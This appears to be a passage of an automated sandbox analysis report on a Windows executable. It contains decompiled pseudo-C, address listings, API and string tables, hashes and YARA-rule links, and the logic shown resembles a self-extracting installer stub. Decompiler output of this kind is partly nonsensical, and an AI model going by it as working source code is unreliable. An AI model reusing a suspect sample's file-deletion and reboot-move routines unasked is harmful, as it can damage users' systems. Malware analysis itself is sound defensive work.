				_t206 = GetProcAddress(_t200, "SetDefaultDllDirectories");
				if(_t206 != 0) {
					_t182 = _t206;
					 *0x1242260(((0 | _t180 == 0x00000000) - 0x00000001 & 0xfffff800) + 0x1000);
					 *_t206();
					_t180 = 1;
				}
				goto L5;
			}
























                                                                                                                                                    0x01220032
                                                                                                                                                    0x01220038
                                                                                                                                                    0x01220040
                                                                                                                                                    0x01220048
                                                                                                                                                    0x0122004c
                                                                                                                                                    0x012200b2
                                                                                                                                                    0x012200b2
                                                                                                                                                    0x012200b7
                                                                                                                                                    0x012200ba
                                                                                                                                                    0x012200c2
                                                                                                                                                    0x012200c7
                                                                                                                                                    0x012200cf
                                                                                                                                                    0x012200da
                                                                                                                                                    0x012200e2
                                                                                                                                                    0x012200ea
                                                                                                                                                    0x012200f2
                                                                                                                                                    0x012200fa
                                                                                                                                                    0x01220102
                                                                                                                                                    0x0122010a
                                                                                                                                                    0x01220112
                                                                                                                                                    0x0122011a
                                                                                                                                                    0x01220122
                                                                                                                                                    0x0122012a
                                                                                                                                                    0x01220132
                                                                                                                                                    0x0122013a
                                                                                                                                                    0x01220142
                                                                                                                                                    0x0122014a
                                                                                                                                                    0x01220152
                                                                                                                                                    0x0122015a
                                                                                                                                                    0x01220162
                                                                                                                                                    0x0122016a
                                                                                                                                                    0x01220172
                                                                                                                                                    0x0122017a
                                                                                                                                                    0x01220182
                                                                                                                                                    0x0122018a
                                                                                                                                                    0x01220192
                                                                                                                                                    0x0122019a
                                                                                                                                                    0x012201a5
                                                                                                                                                    0x012201b0
                                                                                                                                                    0x012201bb
                                                                                                                                                    0x012201c6
                                                                                                                                                    0x012201d1
                                                                                                                                                    0x012201dc
                                                                                                                                                    0x012201e7
                                                                                                                                                    0x012201f2
                                                                                                                                                    0x012201fd
                                                                                                                                                    0x01220208
                                                                                                                                                    0x01220213
                                                                                                                                                    0x0122021e
                                                                                                                                                    0x01220229
                                                                                                                                                    0x01220234
                                                                                                                                                    0x0122023f
                                                                                                                                                    0x0122024a
                                                                                                                                                    0x01220255
                                                                                                                                                    0x01220260
                                                                                                                                                    0x0122026b
                                                                                                                                                    0x01220276
                                                                                                                                                    0x01220281
                                                                                                                                                    0x0122028c
                                                                                                                                                    0x01220297
                                                                                                                                                    0x012202a2
                                                                                                                                                    0x012202ad
                                                                                                                                                    0x012202b8
                                                                                                                                                    0x012202c3
                                                                                                                                                    0x012202ce
                                                                                                                                                    0x012202d9
                                                                                                                                                    0x012202e4
                                                                                                                                                    0x012202ef
                                                                                                                                                    0x012202fa
                                                                                                                                                    0x01220305
                                                                                                                                                    0x01220310
                                                                                                                                                    0x012203e2
                                                                                                                                                    0x012203ed
                                                                                                                                                    0x0122040a
                                                                                                                                                    0x0122040f
                                                                                                                                                    0x01220411
                                                                                                                                                    0x01220413
                                                                                                                                                    0x0122041d
                                                                                                                                                    0x0122042a
                                                                                                                                                    0x0122042a
                                                                                                                                                    0x0122041f
                                                                                                                                                    0x01220423
                                                                                                                                                    0x01220423
                                                                                                                                                    0x0122042e
                                                                                                                                                    0x01220450
                                                                                                                                                    0x01220450
                                                                                                                                                    0x01220461
                                                                                                                                                    0x0122046e
                                                                                                                                                    0x01220476
                                                                                                                                                    0x01220480
                                                                                                                                                    0x01220484
                                                                                                                                                    0x01220486
                                                                                                                                                    0x012204be
                                                                                                                                                    0x012204be
                                                                                                                                                    0x012204c0
                                                                                                                                                    0x012205d7
                                                                                                                                                    0x012205d7
                                                                                                                                                    0x012204ce
                                                                                                                                                    0x012204dd
                                                                                                                                                    0x0122054c
                                                                                                                                                    0x01220554
                                                                                                                                                    0x01220568
                                                                                                                                                    0x0122056d
                                                                                                                                                    0x01220570
                                                                                                                                                    0x01220576
                                                                                                                                                    0x01220578
                                                                                                                                                    0x01220581
                                                                                                                                                    0x01220596
                                                                                                                                                    0x012205ae
                                                                                                                                                    0x012205b9
                                                                                                                                                    0x012205bf
                                                                                                                                                    0x012205bf
                                                                                                                                                    0x012204df
                                                                                                                                                    0x012204e4
                                                                                                                                                    0x012204ee
                                                                                                                                                    0x012204fa
                                                                                                                                                    0x01220502
                                                                                                                                                    0x0122051c
                                                                                                                                                    0x01220521
                                                                                                                                                    0x0122053b
                                                                                                                                                    0x0122053b
                                                                                                                                                    0x012205c7
                                                                                                                                                    0x012205c7
                                                                                                                                                    0x01220488
                                                                                                                                                    0x0122048a
                                                                                                                                                    0x0122048a
                                                                                                                                                    0x0122049b
                                                                                                                                                    0x012204a8
                                                                                                                                                    0x012204b0
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012204b2
                                                                                                                                                    0x012204b6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012204b8
                                                                                                                                                    0x012204ba
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012204ba
                                                                                                                                                    0x01220430
                                                                                                                                                    0x01220445
                                                                                                                                                    0x0122044b
                                                                                                                                                    0x0122044e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122044e
                                                                                                                                                    0x01220478
                                                                                                                                                    0x01220478
                                                                                                                                                    0x01220479
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122047e
                                                                                                                                                    0x0122031c
                                                                                                                                                    0x0122031e
                                                                                                                                                    0x01220321
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x01220332
                                                                                                                                                    0x01220354
                                                                                                                                                    0x01220358
                                                                                                                                                    0x012203d6
                                                                                                                                                    0x012203d7
                                                                                                                                                    0x012203dd
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122036a
                                                                                                                                                    0x0122037f
                                                                                                                                                    0x01220385
                                                                                                                                                    0x01220387
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x0122038f
                                                                                                                                                    0x01220391
                                                                                                                                                    0x01220396
                                                                                                                                                    0x012203a5
                                                                                                                                                    0x012203ad
                                                                                                                                                    0x012203cb
                                                                                                                                                    0x012203d0
                                                                                                                                                    0x012203d2
                                                                                                                                                    0x012203d4
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012203b8
                                                                                                                                                    0x012203bd
                                                                                                                                                    0x012203c9
                                                                                                                                                    0x012203ca
                                                                                                                                                    0x012203ca
                                                                                                                                                    0x00000000
                                                                                                                                                    0x012203cb
                                                                                                                                                    0x01220358
                                                                                                                                                    0x01220054
                                                                                                                                                    0x0122005a
                                                                                                                                                    0x01220061
                                                                                                                                                    0x01220065
                                                                                                                                                    0x0122006c
                                                                                                                                                    0x01220075
                                                                                                                                                    0x01220077
                                                                                                                                                    0x0122007d
                                                                                                                                                    0x0122007d
                                                                                                                                                    0x0122008b
                                                                                                                                                    0x0122008f
                                                                                                                                                    0x012200a6
                                                                                                                                                    0x012200a8
                                                                                                                                                    0x012200ae
                                                                                                                                                    0x012200b0
                                                                                                                                                    0x012200b0
                                                                                                                                                    0x00000000

                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(kernel32), ref: 01220042
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 01220054
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 01220085
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 01220332
                                                                                                                                                    • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0122034E
                                                                                                                                                    • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 01220360
                                                                                                                                                    • ReadFile.KERNEL32(00000000,?,00007FFE,01242BA4,00000000), ref: 0122037F
                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 012203D7
                                                                                                                                                    • GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 012203ED
                                                                                                                                                    • CompareStringW.KERNELBASE(00000400,00001001,?,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 01220445
                                                                                                                                                    • GetFileAttributesW.KERNELBASE(?,?,?,00000800,?,00000000,?,00000800), ref: 0122046E
                                                                                                                                                    • GetFileAttributesW.KERNEL32(?,?,?,00000800), ref: 012204A8
                                                                                                                                                      • Part of subcall function 0121FFE3: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0121FFFE
                                                                                                                                                      • Part of subcall function 0121FFE3: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0121EAC6,Crypt32.dll,00000000,0121EB4A,?,?,0121EB2C,?,?,?), ref: 01220020
                                                                                                                                                    • _swprintf.LIBCMT ref: 0122051C
                                                                                                                                                    • _swprintf.LIBCMT ref: 01220568
                                                                                                                                                      • Part of subcall function 01213FD6: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 01213FE9
                                                                                                                                                    • AllocConsole.KERNEL32 ref: 01220570
                                                                                                                                                    • GetCurrentProcessId.KERNEL32 ref: 0122057A
                                                                                                                                                    • AttachConsole.KERNEL32(00000000), ref: 01220581
                                                                                                                                                    • GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 012205A7
                                                                                                                                                    • WriteConsoleW.KERNEL32(00000000), ref: 012205AE
                                                                                                                                                    • Sleep.KERNEL32(00002710), ref: 012205B9
                                                                                                                                                    • FreeConsole.KERNEL32 ref: 012205BF
                                                                                                                                                    • ExitProcess.KERNEL32 ref: 012205C7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000001.00000002.366146304.0000000001211000.00000020.00020000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                    • Associated: 00000001.00000002.366142532.0000000001210000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366170396.0000000001242000.00000002.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366180315.000000000124D000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366186141.0000000001253000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366192695.0000000001270000.00000004.00020000.sdmp Download File
                                                                                                                                                    • Associated: 00000001.00000002.366197805.0000000001271000.00000002.00020000.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
                                                                                                                                                    • String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
                                                                                                                                                    • API String ID: 1201351596-3298887752
                                                                                                                                                    • Opcode ID: b21fcfa509c6f791da4817ea45b0733960b4f740a67c8ecbaead6dec7bf19359
                                                                                                                                                    • Instruction ID: 9eb454077c1a748ce6d1cfb1159a1e1a6b877b9dfb0dae8d1536569c46a58f1a
                                                                                                                                                    • Opcode Fuzzy Hash: b21fcfa509c6f791da4817ea45b0733960b4f740a67c8ecbaead6dec7bf19359
                                                                                                                                                    • Instruction Fuzzy Hash: 1AD19DB1128395EBD33DDF62E848BAFBAE8FF94704F50491CF68996140DB708548CB66
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0122BD35, Relevance: 37.2, APIs: 17, Strings: 4, Instructions: 428windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    C-Code - Quality: 60%
                                                                                                                                                    			E0122BD35(void* __edx) {
				intOrPtr _t213;
				void* _t218;
				intOrPtr _t274;
				void* _t287;
				signed int _t289;
				void* _t293;
				signed int _t294;
				void* _t298;

				_t287 = __edx;
				E0122E0E4(E01241E93, _t298);
				_t213 = 0x1bc80;
				E0122E1C0();
				if( *((intOrPtr*)(_t298 + 0xc)) == 0) {
					L167:
					 *[fs:0x0] =  *((intOrPtr*)(_t298 - 0xc));
					return _t213;
				}
				_push(0x1000);
				_push(_t298 - 0xe);
				_push(_t298 - 0xd);
				_push(_t298 - 0x5c84);
				_push(_t298 - 0xfc8c);
				_push( *((intOrPtr*)(_t298 + 0xc)));
				_t213 = E0122A986();
				 *((intOrPtr*)(_t298 + 0xc)) = 0x1bc80;
				if(0x1bc80 != 0) {
					_t274 =  *((intOrPtr*)(_t298 + 0x10));
					do {
						_t218 = _t298 - 0x5c84;
						_t293 = _t298 - 0x1bc8c;
						_t289 = 6;
						goto L4;
						L6:
						while(E01221708(_t298 - 0xfc8c,  *((intOrPtr*)(0x124d618 + _t294 * 4))) != 0) {
							_t294 = _t294 + 1;
							if(_t294 < 0xe) {
								continue;
							} else {
								goto L165;
							}
						}
						if(_t294 > 0xd) {
							goto L165;
						}
						switch( *((intOrPtr*)(_t294 * 4 +  &M0122C929))) {
							case 0:
								__eflags = _t274 - 2;
								if(_t274 == 2) {
									E01229D58(_t298 - 0x7c84, 0x800);
									E0121A3DD(E0121B8A5(_t298 - 0x7c84, _t298 - 0x5c84, _t298 - 0xdc8c, 0x800), _t274, _t298 - 0x8c8c, _t294);
									 *(_t298 - 4) = 0;
									E0121A517(_t298 - 0x8c8c, _t298 - 0xdc8c);
									E01217098(_t298 - 0x3c84);
									while(1) {
										_push(0);
										_t282 = _t298 - 0x8c8c;
										_t236 = E0121A46A(_t298 - 0x8c8c, _t287, _t298 - 0x3c84);
										__eflags = _t236;
										if(_t236 == 0) {
											break;
										}
										SetFileAttributesW(_t298 - 0x3c84, 0);
										__eflags =  *(_t298 - 0x2c78);
										if(__eflags == 0) {
											L18:
											_t240 = GetFileAttributesW(_t298 - 0x3c84);
											__eflags = _t240 - 0xffffffff;
											if(_t240 == 0xffffffff) {
												continue;
											}
											_t242 = DeleteFileW(_t298 - 0x3c84);
											__eflags = _t242;
											if(_t242 != 0) {
												continue;
											} else {
												_t296 = 0;
												_push(0);
												goto L22;
												L22:
												E01213FD6(_t298 - 0x103c, 0x800, L"%s.%d.tmp", _t298 - 0x3c84);
												_t300 = _t300 + 0x14;
												_t247 = GetFileAttributesW(_t298 - 0x103c);
												__eflags = _t247 - 0xffffffff;
												if(_t247 != 0xffffffff) {
													_t296 = _t296 + 1;
													__eflags = _t296;
													_push(_t296);
													goto L22;
												} else {
													_t250 = MoveFileW(_t298 - 0x3c84, _t298 - 0x103c);
													__eflags = _t250;
													if(_t250 != 0) {
														MoveFileExW(_t298 - 0x103c, 0, 4);
													}
													continue;
												}
											}
										}
										E0121B437(_t282, __eflags, _t298 - 0x7c84, _t298 - 0x103c, 0x800);
										E0121B147(__eflags, _t298 - 0x103c, 0x800);
										_t297 = E012333F3(_t298 - 0x7c84);
										__eflags = _t297 - 4;
										if(_t297 < 4) {
											L16:
											_t261 = E0121B865(_t298 - 0x5c84);
											__eflags = _t261;
											if(_t261 != 0) {
												break;
											}
											L17:
											_t264 = E012333F3(_t298 - 0x3c84);
											__eflags = 0;
											 *((short*)(_t298 + _t264 * 2 - 0x3c82)) = 0;
											E0122F1A0(0x800, _t298 - 0x3c, 0, 0x1e);
											_t300 = _t300 + 0x10;
											 *((intOrPtr*)(_t298 - 0x38)) = 3;
											_push(0x14);
											_pop(_t267);
											 *((short*)(_t298 - 0x2c)) = _t267;
											 *((intOrPtr*)(_t298 - 0x34)) = _t298 - 0x3c84;
											_push(_t298 - 0x3c);
											 *0x1271074();
											goto L18;
										}
										_t272 = E012333F3(_t298 - 0x103c);
										__eflags = _t297 - _t272;
										if(_t297 > _t272) {
											goto L17;
										}
										goto L16;
									}
									 *(_t298 - 4) =  *(_t298 - 4) | 0xffffffff;
									E0121A3F3(_t298 - 0x8c8c);
								}
								goto L165;
							case 1:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L165;
								} else {
									__eax =  *0x126cc7c;
									__eflags =  *0x126cc7c;
									__ebx = __ebx & 0xffffff00 |  *0x126cc7c == 0x00000000;
									__eflags = __bl;
									if(__bl == 0) {
										__eax =  *0x126cc7c;
										_pop(__ecx);
										_pop(__ecx);
									}
									__bh =  *((intOrPtr*)(__ebp - 0xd));
									__eflags = __bh;
									if(__eflags == 0) {
										__eax = __ebp + 0xc;
										_push(__ebp + 0xc);
										__esi = E0122AAEA(__ecx, __edx, __eflags);
										__eax =  *0x126cc7c;
									} else {
										__esi = __ebp - 0x5c84;
									}
									__eflags = __bl;
									if(__bl == 0) {
										__edi = __eax;
									}
									__eax = E012333F3(__esi);
									__eax = __eax + __edi;
									_push(__eax);
									_push( *0x126cc7c);
									__eax = E0123341E(__ecx, __edx);
									__esp = __esp + 0xc;
									__eflags = __eax;
									if(__eax == 0) {
										L39:
										__eflags = __bh;
										if(__bh == 0) {
											__eax = L0123340E(__esi);
										}
										goto L165;
									}
									 *0x126cc7c = __eax;
									__eflags = __bl;
									if(__bl != 0) {
										__ecx = 0;
										__eflags = 0;
										 *__eax = __cx;
									}
									__eax = E01236FAD(__eax, __esi);
									_pop(__ecx);
									_pop(__ecx);
									goto L39;
								}
							case 2:
								__eflags = __ebx;
								if(__ebx == 0) {
									__ebp - 0x5c84 = SetWindowTextW( *(__ebp + 8), __ebp - 0x5c84);
								}
								goto L165;
							case 3:
								__eflags = __ebx;
								if(__ebx != 0) {
									goto L165;
								}
								__eflags =  *0x1259472 - __di;
								if( *0x1259472 != __di) {
									goto L165;
								}
								__eax = 0;
								__edi = __ebp - 0x5c84;
								_push(0x22);
								 *(__ebp - 0x103c) = __ax;
								_pop(__eax);
								__eflags =  *(__ebp - 0x5c84) - __ax;
								if( *(__ebp - 0x5c84) == __ax) {
									__edi = __ebp - 0x5c82;
								}
								__eax = E012333F3(__edi);
								__esi = 0x800;
								__eflags = __eax - 0x800;
								if(__eax >= 0x800) {
									goto L165;
								} else {
									__eax =  *__edi & 0x0000ffff;
									_push(0x5c);
									_pop(__ecx);
									__eflags = ( *__edi & 0x0000ffff) - 0x2e;
									if(( *__edi & 0x0000ffff) != 0x2e) {
										L52:
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L64:
											__ebp - 0x103c = E0121FD96(__ebp - 0x103c, __edi, __esi);
											__ebx = 0;
											__eflags = 0;
											L65:
											_push(0x22);
											_pop(__eax);
											__eax = __ebp - 0x103c;
											__eax = E0123161B(__ebp - 0x103c, __ebp - 0x103c);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__eflags =  *((intOrPtr*)(__eax + 2)) - __bx;
												if( *((intOrPtr*)(__eax + 2)) == __bx) {
													__ecx = 0;
													__eflags = 0;
													 *__eax = __cx;
												}
											}
											__eax = __ebp - 0x103c;
											__edi = 0x1259472;
											E0121FD96(0x1259472, __ebp - 0x103c, __esi) = __ebp - 0x103c;
											__eax = E0122A81F(__ebp - 0x103c, __esi);
											__esi = GetDlgItem( *(__ebp + 8), 0x66);
											__ebp - 0x103c = SetWindowTextW(__esi, __ebp - 0x103c); // executed
											__eax = SendMessageW(__esi, 0x143, __ebx, 0x1259472); // executed
											__eax = __ebp - 0x103c;
											__eax = E01233429(__ebp - 0x103c, 0x1259472, __eax);
											_pop(__ecx);
											_pop(__ecx);
											__eflags = __eax;
											if(__eax != 0) {
												__ebp - 0x103c = SendMessageW(__esi, 0x143, __ebx, __ebp - 0x103c);
											}
											goto L165;
										}
										__eflags = __ax;
										if(__ax == 0) {
											L55:
											__eax = __ebp - 0x18;
											__ebx = 0;
											__eax = RegOpenKeyExW(0x80000002, L"Software\\Microsoft\\Windows\\CurrentVersion", 0, 1, __ebp - 0x18); // executed
											__eflags = __eax;
											if(__eax == 0) {
												__eax = __ebp - 0x14;
												 *(__ebp - 0x14) = 0x1000;
												__ebp - 0x103c = __ebp - 0x1c;
												__eax = RegQueryValueExW( *(__ebp - 0x18), L"ProgramFilesDir", 0, __ebp - 0x1c, __ebp - 0x103c, __ebp - 0x14); // executed
												__eax = RegCloseKey( *(__ebp - 0x18)); // executed
												__eax =  *(__ebp - 0x14);
												__ecx = 0x7ff;
												__eax =  *(__ebp - 0x14) >> 1;
												__eflags = __eax - 0x7ff;
												if(__eax >= 0x7ff) {
													__eax = 0x7ff;
												}
												__ecx = 0;
												__eflags = 0;
												 *(__ebp + __eax * 2 - 0x103c) = __cx;
											}
											__eflags =  *(__ebp - 0x103c) - __bx;
											if( *(__ebp - 0x103c) != __bx) {
												__eax = __ebp - 0x103c;
												__eax = E012333F3(__ebp - 0x103c);
												_push(0x5c);
												_pop(__ecx);
												__eflags =  *((intOrPtr*)(__ebp + __eax * 2 - 0x103e)) - __cx;
												if(__eflags != 0) {
													__ebp - 0x103c = E0121FD6E(__eflags, __ebp - 0x103c, "\\", __esi);
												}
											}
											__esi = E012333F3(__edi);
											__eax = __ebp - 0x103c;
											__eflags = __esi - 0x7ff;
											__esi = 0x800;
											if(__eflags < 0) {
												__ebp - 0x103c = E0121FD6E(__eflags, __ebp - 0x103c, __edi, 0x800);
											}
											goto L65;
										}
										__eflags =  *((short*)(__edi + 2)) - 0x3a;
										if( *((short*)(__edi + 2)) == 0x3a) {
											goto L64;
										}
										goto L55;
									}
									__eflags =  *((intOrPtr*)(__edi + 2)) - __cx;
									if( *((intOrPtr*)(__edi + 2)) != __cx) {
										goto L52;
									}
									__edi = __edi + 4;
									__ebx = 0;
									__eflags =  *__edi - __bx;
									if( *__edi == __bx) {
										goto L165;
									}
									__ebp - 0x103c = E0121FD96(__ebp - 0x103c, __edi, 0x800);
									goto L65;
								}
							case 4:
								__eflags =  *0x125946c - 1;
								__eflags = __eax - 0x125946c;
								 *__edi =  *__edi + __ecx;
								__eflags =  *(__ebx + 6) & __bl;
								 *__eax =  *__eax + __al;
								__eflags =  *__eax;
							case 5:
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__ecx = 0;
								__eax =  *(__ebp - 0x5c84) & 0x0000ffff;
								__eflags = __eax;
								if(__eax == 0) {
									L82:
									 *0x1257442 = __cl;
									 *0x1257443 = 1;
									goto L165;
								}
								__eax = __eax - 0x30;
								__eflags = __eax;
								if(__eax == 0) {
									 *0x1257442 = __cl;
									L81:
									 *0x1257443 = __cl;
									goto L165;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax == 0) {
									goto L82;
								}
								__eax = __eax - 1;
								__eflags = __eax;
								if(__eax != 0) {
									goto L165;
								}
								 *0x1257442 = 1;
								goto L81;
							case 6:
								__eflags = __ebx - 4;
								if(__ebx != 4) {
									goto L92;
								}
								__eax = __ebp - 0x5c84;
								__eax = E01233429(__ebp - 0x5c84, __eax, L"<>");
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax == 0) {
									goto L92;
								}
								_push(__edi);
								goto L91;
							case 7:
								__eflags = __ebx - 1;
								if(__eflags != 0) {
									L113:
									__eflags = __ebx - 7;
									if(__ebx == 7) {
										__eflags =  *0x125946c;
										if( *0x125946c == 0) {
											 *0x125946c = 2;
										}
										 *0x1258468 = 1;
									}
									goto L165;
								}
								__eax = __ebp - 0x7c84;
								__edi = 0x800;
								GetTempPathW(0x800, __ebp - 0x7c84) = __ebp - 0x7c84;
								E0121B147(__eflags, __ebp - 0x7c84, 0x800) = 0;
								__esi = 0;
								_push(0);
								while(1) {
									_push( *0x124d5f8);
									__ebp - 0x7c84 = E01213FD6(0x125846a, __edi, L"%s%s%u", __ebp - 0x7c84);
									__eax = E0121A0C0(0x125846a);
									__eflags = __al;
									if(__al == 0) {
										break;
									}
									__esi =  &(__esi->i);
									__eflags = __esi;
									_push(__esi);
								}
								__eax = SetDlgItemTextW( *(__ebp + 8), 0x66, 0x125846a);
								__eflags =  *(__ebp - 0x5c84);
								if( *(__ebp - 0x5c84) == 0) {
									goto L165;
								}
								__eflags =  *0x1265b72;
								if( *0x1265b72 != 0) {
									goto L165;
								}
								__eax = 0;
								 *(__ebp - 0x143c) = __ax;
								__eax = __ebp - 0x5c84;
								_push(0x2c);
								_push(__ebp - 0x5c84);
								__eax = E01231438(__ecx);
								_pop(__ecx);
								_pop(__ecx);
								__eflags = __eax;
								if(__eax != 0) {
									L109:
									__eflags =  *(__ebp - 0x143c);
									if( *(__ebp - 0x143c) == 0) {
										__ebp - 0x1bc8c = __ebp - 0x5c84;
										E0121FD96(__ebp - 0x5c84, __ebp - 0x1bc8c, 0x1000) = __ebp - 0x19c8c;
										__ebp - 0x143c = E0121FD96(__ebp - 0x143c, __ebp - 0x19c8c, 0x200);
									}
									__ebp - 0x5c84 = E0122A472(__ebp - 0x5c84);
									__eax = 0;
									 *(__ebp - 0x4c84) = __ax;
									__ebp - 0x143c = __ebp - 0x5c84;
									__eax = E01229EB3( *(__ebp + 8), __ebp - 0x5c84, __ebp - 0x143c, 0x24);
									__eflags = __eax - 6;
									if(__eax == 6) {
										goto L165;
									} else {
										__eax = 0;
										__eflags = 0;
										 *0x1257447 = 1;
										 *0x125846a = __ax;
										__eax = EndDialog( *(__ebp + 8), 1);
										goto L113;
									}
								}
								__edx = 0;
								__esi = 0;
								__eflags =  *(__ebp - 0x5c84) - __dx;
								if( *(__ebp - 0x5c84) == __dx) {
									goto L109;
								}
								__ecx = 0;
								__eax = __ebp - 0x5c84;
								while(1) {
									__eflags =  *__eax - 0x40;
									if( *__eax == 0x40) {
										break;
									}
									__esi =  &(__esi->i);
									__eax = __ebp - 0x5c84;
									__ecx = __esi + __esi;
									__eax = __ebp - 0x5c84 + __ecx;
									__eflags =  *__eax - __dx;
									if( *__eax != __dx) {
										continue;
									}
									goto L109;
								}
								__ebp - 0x5c82 = __ebp - 0x5c82 + __ecx;
								__ebp - 0x143c = E0121FD96(__ebp - 0x143c, __ebp - 0x5c82 + __ecx, 0x200);
								__eax = 0;
								__eflags = 0;
								 *(__ebp + __esi * 2 - 0x5c84) = __ax;
								goto L109;
							case 8:
								__eflags = __ebx - 3;
								if(__ebx == 3) {
									__eflags =  *(__ebp - 0x5c84) - __di;
									if(__eflags != 0) {
										__eax = __ebp - 0x5c84;
										_push(__ebp - 0x5c84);
										__eax = E01236F4C(__ebx, __edi);
										_pop(__ecx);
										 *0x126dc8c = __eax;
									}
									__eax = __ebp + 0xc;
									_push(__ebp + 0xc);
									 *0x126dc88 = E0122AAEA(__ecx, __edx, __eflags);
								}
								 *0x1265b73 = 1;
								goto L165;
							case 9:
								__eflags = __ebx - 5;
								if(__ebx != 5) {
									L92:
									 *0x126dc90 = 1;
									goto L165;
								}
								_push(1);
								L91:
								__eax = __ebp - 0x5c84;
								_push(__ebp - 0x5c84);
								_push( *(__ebp + 8));
								__eax = E0122CC9F(__ebp);
								goto L92;
							case 0xa:
								__eflags = __ebx - 6;
								if(__ebx != 6) {
									goto L165;
								}
								__eax = 0;
								 *(__ebp - 0x2c3c) = __ax;
								__eax =  *(__ebp - 0x1bc8c) & 0x0000ffff;
								__eax = E01236280( *(__ebp - 0x1bc8c) & 0x0000ffff);
								_push(0x800);
								__eflags = __eax - 0x50;
								if(__eax == 0x50) {
									_push(0x126ab7a);
									__eax = __ebp - 0x2c3c;
									_push(__ebp - 0x2c3c);
									__eax = E0121FD96();
									 *(__ebp - 0x14) = 2;
								} else {
									__eflags = __eax - 0x54;
									__eax = __ebp - 0x2c3c;
									if(__eflags == 0) {
										_push(0x1269b7a);
										_push(__eax);
										__eax = E0121FD96();
										 *(__ebp - 0x14) = 7;
									} else {
										_push(0x126bb7a);
										_push(__eax);
										__eax = E0121FD96();
										 *(__ebp - 0x14) = 0x10;
									}
								}
								__eax = 0;
								 *(__ebp - 0x9c8c) = __ax;
								 *(__ebp - 0x1c3c) = __ax;
								__ebp - 0x19c8c = __ebp - 0x6c84;
								__eax = E01235646(__ebp - 0x6c84, __ebp - 0x19c8c);
								_pop(__ecx);
								_pop(__ecx);
								_push(0x22);
								_pop(__ebx);
								__eflags =  *(__ebp - 0x6c84) - __bx;
								if( *(__ebp - 0x6c84) != __bx) {
									__ebp - 0x6c84 = E0121A0C0(__ebp - 0x6c84);
									__eflags = __al;
									if(__al != 0) {
										goto L150;
									}
									__ebx = __edi;
									__esi = __ebp - 0x6c84;
									__eflags =  *(__ebp - 0x6c84) - __bx;
									if( *(__ebp - 0x6c84) == __bx) {
										goto L150;
									}
									_push(0x20);
									_pop(__ecx);
									do {
										__eax = __esi->i & 0x0000ffff;
										__eflags = __ax - __cx;
										if(__ax == __cx) {
											L138:
											__edi = __eax;
											__eax = 0;
											__esi->i = __ax;
											__ebp - 0x6c84 = E0121A0C0(__ebp - 0x6c84);
											__eflags = __al;
											if(__al == 0) {
												__esi->i = __di;
												L146:
												_push(0x20);
												_pop(__ecx);
												__edi = 0;
												__eflags = 0;
												goto L147;
											}
											_push(0x2f);
											_pop(__eax);
											__ebx = __esi;
											__eflags = __di - __ax;
											if(__di != __ax) {
												_push(0x20);
												_pop(__eax);
												do {
													__esi =  &(__esi->i);
													__eflags = __esi->i - __ax;
												} while (__esi->i == __ax);
												_push(__esi);
												__eax = __ebp - 0x1c3c;
												L144:
												_push(__eax);
												__eax = E01235646();
												_pop(__ecx);
												_pop(__ecx);
												 *__ebx = __di;
												goto L146;
											}
											 *(__ebp - 0x1c3c) = __ax;
											__eax =  &(__esi->i);
											_push( &(__esi->i));
											__eax = __ebp - 0x1c3a;
											goto L144;
										}
										_push(0x2f);
										_pop(__edx);
										__eflags = __ax - __dx;
										if(__ax != __dx) {
											goto L147;
										}
										goto L138;
										L147:
										__esi =  &(__esi->i);
										__eflags = __esi->i - __di;
									} while (__esi->i != __di);
									__eflags = __ebx;
									if(__ebx != 0) {
										__eax = 0;
										__eflags = 0;
										 *__ebx = __ax;
									}
									goto L150;
								} else {
